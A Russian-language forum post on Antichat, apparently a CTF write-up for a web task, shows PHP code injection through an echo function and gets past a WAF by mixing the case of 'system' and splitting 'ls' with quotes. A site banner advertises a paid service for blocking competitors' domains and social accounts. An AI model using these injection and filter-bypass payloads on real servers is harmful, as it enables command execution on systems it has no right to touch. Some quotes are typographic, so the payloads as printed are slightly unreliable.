Writeup обходной путь (Web Antichat.games)

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Задания/Квесты/CTF/Конкурсы
Writeup обходной путь (Web Antichat.games)

Опции темы

Поиск в этой теме

Опции просмотра

13.12.2023, 18:45

tree

Новичок

Регистрация: 12.12.2023

Сообщений: 0

С нами: 1275821

Репутация: 0

Привет! Разберем решение таска Обходной путь
Функционал приложения php функция - echo. появляется мысль о эксплутации php injection попробуем вывести phpinfo()

Сработало! значит попробуем выполнить команды на сервере через функцию system
echo '123';system(”id”);

WAF нас блочит, значит будем пробовать обойти фильтрацию.
echo '123';sYsTem("id");

Отлично! Пробуем посмотреть файлы в каталоге.
echo '123';sYsTem("ls");
но WAF снова нас заблочил, значит и тут найти обходной путь
echo ‘123’;sYsTem("'l''s'"’);

Дальше остается найти только флаг

𝕏 Twitter Reddit Telegram Копировать ссылку

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход